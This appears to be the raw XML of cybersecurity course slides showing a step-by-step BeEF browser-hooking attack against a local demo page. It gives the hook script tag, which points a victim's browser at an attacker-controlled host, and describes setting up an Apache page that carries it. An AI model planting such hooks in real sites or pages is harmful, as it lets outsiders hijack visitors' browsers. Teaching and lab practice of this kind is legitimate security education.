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79" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="280" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="278"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1/9/2023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1/9/2023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905AFB9F-C45D-4B4C-B917-237DD268672B}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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54C455CB-3906-4CEE-BA2C-9C224585F2B1}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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315138C-4D1B-42B1-A118-2C1F59DFB502}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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0DD0D09-97D7-4DCC-9186-03CBB705FFEE}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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203D54C-CED0-4DF5-8A4A-7255E739C4BC}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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03946-4B16-4F56-92E2-6F0F0358533B}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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84B882F-6062-4AD0-BE64-C8C1A17740AC}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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43A2D40-7848-4257-A2F0-2F92A5673A16}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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4E2466B-D8DA-4E5A-B581-A91FB8B078BD}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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C10D759-8494-4102-9F34-75063F9EC013}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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E26358F8-BB8D-470E-9536-9319282E541B}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</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olinuxcloud.com/wp-content/uploads/Picture8-3.png"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Webapp attack using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BEef</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber Security: A Practical Approach </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C455A8-A2FF-0893-4523-FE569E0AFFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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363363DD-0367-1EC7-06BC-882071AF9074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{75BB2443-A1C0-47BC-ABE2-F83CBA3D083F}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773FD42C-A5CF-FAC9-721E-F3E03CCAD98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7F93EC-F9E3-7E2C-B93E-8DBC60985708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573740" y="516395"/>
            <a:ext cx="10829365" cy="873572"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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And after logging in we have a view that looks as shown below. From here you can see the hacked browsers both online and offline.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C399A2E2-C181-921D-A795-4977F00C82F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2791514" y="1555091"/>
            <a:ext cx="6393815" cy="4636135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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209DB-805C-48FD-9064-43241227C558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:50 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA055A2-DE0A-1AE1-73BF-641A558C5EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C49CED5A-BB89-7CBC-8EE1-9DD5AE79FB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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52767E9-A0B8-09F1-0291-8253E2F46F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528918" y="429868"/>
            <a:ext cx="6096000" cy="458074"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="15240" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 3: Hooking the target web browser</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916C8CA2-29A0-3FC4-0074-11B96A3E49D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528917" y="1147481"/>
            <a:ext cx="10963835" cy="646331"/>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Once we have logged into beef hacking framework UI, we now have to create a hook from which we will be able to attack the victim. The hook script looks like this</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA9D7EE-762C-D6CF-964D-3E41A5A21D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2948047" y="2151146"/>
            <a:ext cx="626004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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="14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src</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="http://&lt;IP ADDRESS&gt;:3000/hook.js"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US"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59C9DE42-502C-3A2B-5CF5-EF9D6F444E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600635" y="2739904"/>
            <a:ext cx="11098306" cy="646331"/>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Where we have IP you have to replace it with your IP address from where your victim’s browser will hook back to. Beef hacking framework provides for a demo site which can be accessed via</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{550C7120-3FD7-ECC6-E1E3-0F69E182B8AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3493545" y="3839739"/>
            <a:ext cx="4935968"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http://127.0.0.1:3000/demos/basic.html</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US"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AFBA02C4-C36A-9E29-4BC0-A69C083478E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493545" y="3839739"/>
            <a:ext cx="4935968" cy="320432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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F46A8D01-20E3-A079-92E8-388EE276C9D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2841811" y="2092324"/>
            <a:ext cx="6366284" cy="320432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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299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08B1EB-43AD-C06C-DC76-09C2AC3B92B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:50 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C7FE111-DD73-ACC4-E79A-E2B6D6E3108E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E5E1B22-D0E1-3318-582A-CF038355E1C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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1DD31557-D5BE-7FF6-819F-12779294320F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528918" y="532964"/>
            <a:ext cx="8077200"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But we will be creating our own HTML file from where will add our hook.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3742900C-93C9-EF4D-2664-6A41B50FCDC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="902296"/>
            <a:ext cx="7485530" cy="2943563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Steps to create HTML in Kali:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Open another terminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Then type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>cd /var/www/html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Then delete all files in that directory using rm command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Now, type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>nano index.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In editor create your HTML .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Then start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> server using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>service apache2 start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>command.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3045AF86-5323-2EDF-FA2D-B3513EBBD043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2753715" y="3820800"/>
            <a:ext cx="5608806" cy="2331922"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276498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1C283E-77B7-7BF5-4045-C94350736608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:58 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24BC615-E2A9-E9F6-84A0-076ACB7E530D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF962212-9027-E4CD-6161-3505C0EC81D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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32F46D08-2658-DCE3-4D3B-EA6B3773206D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430306" y="393846"/>
            <a:ext cx="8489576" cy="368755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8890" marR="3175" indent="-6350" algn="l">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"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We now have to run our HTML file on a web browser. (By typing 127.0.0.1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B4B7A3-AC27-BC06-B46F-D3E2BF238DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526067" y="829429"/>
            <a:ext cx="6393815" cy="4829810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C90A658-5673-0B77-58E7-C504DEB2FCD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681318" y="5813087"/>
            <a:ext cx="6096000"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As you can see, we have our victims web browser hooked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374658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009A6-DEB2-A53C-5533-9BF8A7603F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{04E9F5D8-599E-453A-AC42-FF6CB32BD6AA}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 10:00 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2182E7-1569-72C4-886B-04BBE29A26BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F555D92-174A-E39A-80A8-9FC4FC11FF13}"/>
              </a:ext>
            </a:extLst>
